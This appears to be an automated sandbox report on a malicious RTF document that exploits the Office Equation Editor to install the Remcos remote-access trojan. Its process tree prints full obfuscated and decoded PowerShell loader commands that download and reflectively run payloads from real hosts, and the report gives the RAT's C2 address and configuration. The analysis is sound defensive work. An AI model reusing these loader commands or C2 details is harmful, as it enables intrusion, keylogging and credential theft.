Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

Overview

General Information

Sample name:	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf
Analysis ID:	1429046
MD5:	bce2afb27ee0e6f7c7696384377941d9
SHA1:	784949119f9a0e8f33a9a6d877de4af4723c7d27
SHA256:	b2b8ef2a3bf64dd5531bd414e7f946c9f040ab2674bc73eb0d4af0d314623174
Tags:	rtf
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Sigma detected: Remcos

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Creates autostart registry keys with suspicious values (likely registry only malware)

Delayed program exit found

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Installs new ROOT certificates

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found URL in obfuscated visual basic script code

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 980 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 1732 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 3088 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRgBEDgTreFEDgTreVwDgTrevDgTreDQDgTreNDgTreDgTrexDgTreC8DgTreNQDgTre3DgTreC4DgTreMDgTreDgTre2DgTreC4DgTreNQDgTre5DgTreC4DgTreMwDgTreyDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBXDgTreFEDgTreUQDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs MD5: EB32C070E658937AA9FA9F3AE629B2B8)

RegAsm.exe (PID: 3532 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

RegAsm.exe (PID: 3540 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

wscript.exe (PID: 3700 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs" MD5: 045451FA238A75305CC26AC982472367)

wscript.exe (PID: 3832 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs" MD5: 045451FA238A75305CC26AC982472367)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-P0AEMX", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1583:$obj2: \objdata 0x156b:$obj3: \objupdate 0x1543:$obj5: \objautlink

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\notess\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x24e910:$a1: Remcos restarted by watchdog! 0x2c7150:$a1: Remcos restarted by watchdog! 0x24ee88:$a3: %02i:%02i:%02i:%03i 0x2c76c8:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 3180	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3180	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3264:$b2: ::FromBase64String( 0xf6777:$b2: ::FromBase64String( 0x117847:$b2: ::FromBase64String( 0x118162:$b2: ::FromBase64String( 0x1191b3:$b2: ::FromBase64String( 0x1197ec:$b2: ::FromBase64String( 0x119fba:$b2: ::FromBase64String( 0x11a578:$b2: ::FromBase64String( 0x30d1:$b3: ::UTF8.GetString( 0x1176ac:$b3: ::UTF8.GetString( 0x117fc7:$b3: ::UTF8.GetString( 0x119018:$b3: ::UTF8.GetString( 0x119651:$b3: ::UTF8.GetString( 0x119e1f:$b3: ::UTF8.GetString( 0x11a3dd:$b3: ::UTF8.GetString( 0x105138:$s1: -join 0x10c78b:$s1: -join 0x178e4:$s3: reverse 0x18f63:$s3: reverse 0x1922e:$s3: reverse 0x198cf:$s3: reverse
Process Memory Space: powershell.exe PID: 3272	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3272	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 3272	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 3272	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6323b8:$a1: Remcos restarted by watchdog! 0x632912:$a3: %02i:%02i:%02i:%03i 0x632d41:$a3: %02i:%02i:%02i:%03i
